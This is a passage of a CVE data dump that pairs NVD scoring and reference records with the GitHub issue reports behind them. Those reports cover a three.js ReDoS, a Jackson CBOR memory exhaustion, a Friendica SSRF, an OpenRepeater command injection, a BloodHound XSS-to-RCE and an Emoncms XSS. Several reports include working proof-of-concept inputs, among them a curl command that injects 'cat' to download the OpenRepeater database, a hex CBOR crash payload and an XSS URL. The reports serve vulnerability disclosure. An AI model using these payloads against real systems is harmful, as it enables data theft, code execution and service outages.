"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/mrdoob/three.js/issues/21132"
},
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-THREE-1064931"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/mrdoob/three.js/issues/21132"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-THREE-1064931"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:three_project:three:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "A5487196-28D5-4BF5-B8A5-D3291128438F",
"versionEndExcluding": "0.125.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/mrdoob/three.js/issues/21132 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"mrdoob",
"three.js"
] | <!-- Ignoring this template may result in your bug report getting deleted -->
Hi,
I would like to report a Regular Expression Denial of Service (REDoS) vulnerability in three.
It allows cause a denial of service when handling rgb or hsl colors.
The vulnerable regex is located in https://github.com/mrdoob/three.js/blob/2d04b4b3f584cb602835ad994ed731b89f541365/src/math/Color.js#L166
**To Reproduce**
Steps to reproduce the behavior:
***Code***
```js
var three = require('three')
function build_blank (n) {
var ret = "rgb("
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "";
}
var Color = three.Color
var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")
```
I am willing to suggest that you replace the regex `/^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/` with `/^((?:rgb|hsl)a?)\(\s*([^\)\s]*)\)/`
| ReDoS in three | https://api.github.com/repos/mrdoob/three.js/issues/21132/comments | 1 | 2021-01-23T10:11:12Z | 2021-01-25T11:58:07Z | https://github.com/mrdoob/three.js/issues/21132 | 792,522,989 | 21,132 | 1,709 |
CVE-2020-28491 | 2021-02-18T16:15:13.207 | This affects the package com.fasterxml.jackson.dataformat:jackson-dataformat-cbor from 0 and before 2.11.4, from 2.12.0-rc1 and before 2.12.1. Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-dataformats-binary/commit/de072d314af8f5f269c8abec6930652af67bc8e6"
},
{
"source": "report@snyk.io",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-dataformats-binary/issues/186"
},
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329"
},
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-dataformats-binary/commit/de072d314af8f5f269c8abec6930652af67bc8e6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-dataformats-binary/issues/186"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-dataformats-binary:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6621426E-1001-48B0-BEFD-F032AFC27526",
"versionEndExcluding": "2.11.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-dataformats-binary:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC85B4D7-6952-41AA-822C-7045F6352300",
"versionEndExcluding": "2.12.1",
"versionEndIncluding": null,
"versionStartExcluding": "2.12.0",
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-dataformats-binary:2.12.0:-:*:*:*:*:*:*",
"matchCriteriaId": "7FBFAC5C-3C12-4F2B-AFA2-38A5D0867F6F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-dataformats-binary:2.12.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "AE827068-6625-4634-9385-3672AB9096F5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-dataformats-binary:2.12.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "2AD45DB3-F35D-486A-B43B-8B71F4CFE221",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*",
"matchCriteriaId": "237329EB-B10C-47DC-8D7B-2B98D21E6CE8",
"versionEndExcluding": "2.0.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/FasterXML/jackson-dataformats-binary/issues/186 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-dataformats-binary"
] | CBORParser.java _finishBytes() accepts an unchecked field string length value discovered during parsing, and is used to allocated a buffer. A malicious payload can be fabricated to exploit this and (at least) cause a java.lang.OutOfMemoryError exception.
```
@SuppressWarnings("resource")
protected byte[] _finishBytes(int len) throws IOException
{
// First, simple: non-chunked
if (len >= 0) {
if (len == 0) {
return NO_BYTES;
}
byte[] b = new byte[len]; <-- OutOfMemoryError here if len is large
```
I am not sure how serious this is in java. With an unmanaged runtime this would be critical security vulnerability.
For example, the following CBOR data (discovered by a fuzzer) leads to len = 2147483647 and triggers this exception on my laptop.
d9d9f7a35a7ffffffff7d9f7f759f7f7f7
This can probably be addressed by simple sanity checking of the len value (non-negative, some max limit).
| Eager allocation of byte buffer can cause `java.lang.OutOfMemoryError` exception (CVE-2020-28491) | https://api.github.com/repos/FasterXML/jackson-dataformats-binary/issues/186/comments | 17 | 2019-10-17T01:59:37Z | 2021-02-19T17:14:01Z | https://github.com/FasterXML/jackson-dataformats-binary/issues/186 | 508,187,241 | 186 | 1,710 |
CVE-2021-27329 | 2021-02-18T18:15:11.677 | Friendica 2021.01 allows SSRF via parse_url?binurl= for DNS lookups or HTTP requests to arbitrary domain names. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/friendica/friendica/issues/9929"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/friendica/friendica/issues/9929"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:frendi:frendica:2021.01:*:*:*:*:*:*:*",
"matchCriteriaId": "7E01771F-BE73-421C-BB99-0257000C0AB5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"918"
] | 918 | https://github.com/friendica/friendica/issues/9929 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"friendica",
"friendica"
] | **Hello Friendica Team.**
### Issue detail
I found a vulnerability issue while testing frendica locally.
It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names and HTTP request.
### Bug Description
The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.
### Steps to Reproduce
**The request:**
```
GET /parse_url?binurl=73767274703267776f7375713063623539706668336f69366a78706e64632e62757270636f6c6c61626f7261746f722e6e6574&_=1613263595343 HTTP/1.1
Host: 192.168.0.3
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```
**The response:**
```
HTTP/1.1 200 OK
Date: Sun, 14 Feb 2021 03:02:34 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.3.27
Set-Cookie: PHPSESSID=9f79e6ff0575a2775860501f03d5095b; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Account-Management-Status: none
Vary: Accept-Encoding
Content-Length: 103
Connection: close
Content-Type: text/html; charset=UTF-8
[attachment type='link' url='http://svrtp2gwosuq0cb59pfh3oi6jxpndc.burpcollaborator.net'][/attachment]
```
**The DNS and HTTP request received:**
<img width="756" alt="image" src="https://user-images.githubusercontent.com/62678327/107867331-d84c7980-6e58-11eb-9f72-a9b39c490212.png">
### More details
To make this request doesn't need to be authenticated, the friendica application accepts any request as an attachment and next do the DNS lookup and the HTTP request.
### Issue remediation
You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures.
These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist.
### References
- [External service interaction (DNS)](https://portswigger.net/kb/issues/00300200_external-service-interaction-dns)
- [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html)
- [CWE-406: Insufficient Control of Network Message Volume (Network Amplification)](https://cwe.mitre.org/data/definitions/406.html)
### Platform Info
This is Friendica, version 2021.01 that is running at the web location localhost
The database version is 1384/1384, the post update version is 1383/.
- Apache/2.4.38 (Debian)
- PHP/7.3.27
- mysql Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2 | External service interaction (HTTP & DNS) | https://api.github.com/repos/friendica/friendica/issues/9929/comments | 5 | 2021-02-14T03:31:00Z | 2021-02-19T06:22:33Z | https://github.com/friendica/friendica/issues/9929 | 807,880,142 | 9,929 | 1,711 |
CVE-2019-25024 | 2021-02-19T04:15:12.160 | OpenRepeater (ORP) before 2.2 allows unauthenticated command injection via shell metacharacters in the functions/ajax_system.php post_service parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/OpenRepeater/openrepeater/issues/66"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/codexlynx/CVE-2019-25024"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/OpenRepeater/openrepeater/issues/66"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/codexlynx/CVE-2019-25024"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:alleghenycreative:openrepeater:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F6B59951-2604-493B-9D6C-FC3805305E0D",
"versionEndExcluding": "2.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"78"
] | 78 | https://github.com/OpenRepeater/openrepeater/issues/66 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"OpenRepeater",
"openrepeater"
] | An unauthenticated malicious actor can execute arbitrary system commands via "__functions/ajax_system.php__". This has a critical impact in the security of the system, for example
* Download system database:
> $ curl \<ADDRESS>/openrepeater/functions/ajax_system.php --data "post_service=;cat /var/lib/openrepeater/db/openrepeater.db" > openrepeater.db
The only limit is imagination.
Regards! | Unauthenticated Command Injection Flaw | https://api.github.com/repos/OpenRepeater/openrepeater/issues/66/comments | 2 | 2019-03-06T21:08:00Z | 2020-12-07T03:16:14Z | https://github.com/OpenRepeater/openrepeater/issues/66 | 418,009,444 | 66 | 1,712 |
CVE-2021-3210 | 2021-02-19T14:15:12.573 | components/Modals/HelpTexts/GenericAll/GenericAll.jsx in Bloodhound <= 4.0.1 allows remote attackers to execute arbitrary system commands when the victim imports a malicious data file containing JavaScript in the objectId parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/BloodHoundAD/BloodHound/blob/338e197dc4b7a1ee929c335141172ada5bc80800/src/components/Modals/HelpModal.jsx#L57"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/BloodHoundAD/BloodHound/blob/338e197dc4b7a1ee929c335141172ada5bc80800/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx#L31-L37"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/BloodHoundAD/BloodHound/issues/338"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/BloodHoundAD/BloodHound/blob/338e197dc4b7a1ee929c335141172ada5bc80800/src/components/Modals/HelpModal.jsx#L57"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/BloodHoundAD/BloodHound/blob/338e197dc4b7a1ee929c335141172ada5bc80800/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx#L31-L37"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/BloodHoundAD/BloodHound/issues/338"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bloodhound_project:bloodhound:*:*:*:*:*:*:*:*",
"matchCriteriaId": "28AF6D85-0B1A-4E95-B434-622D024D82D2",
"versionEndExcluding": null,
"versionEndIncluding": "4.0.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/BloodHoundAD/BloodHound/issues/338 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"BloodHoundAD",
"BloodHound"
] | The **help text**-modal utilizes the React component attribute `dangerouslySetInnerHTML` when rendering the **Info**, **Abuse Info**, etc. texts. E.g. https://github.com/BloodHoundAD/BloodHound/blob/338e197dc4b7a1ee929c335141172ada5bc80800/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx#L31-L37
This makes the application vulnerable to XSS unless the input parameters are properly sanitized/encoded.
It turns out that the parameter `targetId`(objectid) isn't encoded, and is reflected in multiple **Abuse Info**-texts - making the application vulnerable.
https://github.com/BloodHoundAD/BloodHound/blob/338e197dc4b7a1ee929c335141172ada5bc80800/src/components/Modals/HelpModal.jsx#L57
Since Bloodhound is built using Electron, it is possible to spawn child processes from an XSS vector - leading to a RCE vulnerability.
By getting the victim to import a malicious data graph file and clicking **Help** on an edge connected to a malicious node, the XSS payload will trigger.
To mitigate this, encoding `objectid` the same way the node labels are encoded should do the trick.
PoC (Windows):
I've attached a zip, [graph.zip](https://github.com/BloodHoundAD/BloodHound/files/4809807/graph.zip), containing a malicious file, `graph.json`. **(You may need to unzip and manually import the JSON-file).**
1. Import the file `graph.json` into BloodHound.
2. Click **Help** on the edge between `NODE1@DOMAIN.COM` and `MALICIOUS@DOMAIN.COM`.
3. This should pop `notepad.exe C:/windows/win.ini`

| [Security] XSS in HelpModal leading to RCE via imported malicious data file | https://api.github.com/repos/SpecterOps/BloodHound-Legacy/issues/338/comments | 4 | 2020-06-21T16:20:56Z | 2022-08-03T16:14:30Z | https://github.com/SpecterOps/BloodHound-Legacy/issues/338 | 642,594,259 | 338 | 1,713 |
CVE-2021-26716 | 2021-02-21T06:15:12.257 | Modules/input/Views/schedule.php in Emoncms through 10.2.7 allows XSS via the node parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/emoncms/emoncms/issues/1652"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/emoncms/emoncms/issues/1652"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openenergymonitor:emoncms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2CCCE00D-43E0-43B7-8BEE-D3AA3BA629D7",
"versionEndExcluding": null,
"versionEndIncluding": "10.2.7",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/emoncms/emoncms/issues/1652 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"emoncms",
"emoncms"
] | Hi,
I have found a XSS in vulnerability in: emoncms/Modules/input/Views/schedule.php using the parameter 'node'
Proof of concept exploit: http://127.0.0.1:9000/Modules/input/Views/schedule.php?node=1%22;alert(1);var%20x=%22l | XSS Vulnerability | https://api.github.com/repos/emoncms/emoncms/issues/1652/comments | 1 | 2021-01-27T20:28:35Z | 2021-03-14T14:07:52Z | https://github.com/emoncms/emoncms/issues/1652 | 795,420,305 | 1,652 | 1,714 |
CVE-2021-27513 | 2021-02-22T00:15:12.310 | The module admin_ITSM in EyesOfNetwork 5.3-10 allows remote authenticated users to upload arbitrary .xml.php files because it relies on "le filtre userside." | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ArianeBlow/exploit-eyesofnetwork5.3.10/blob/main/PoC-BruteForceID-arbitraty-file-upload-RCE-PrivEsc.py"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
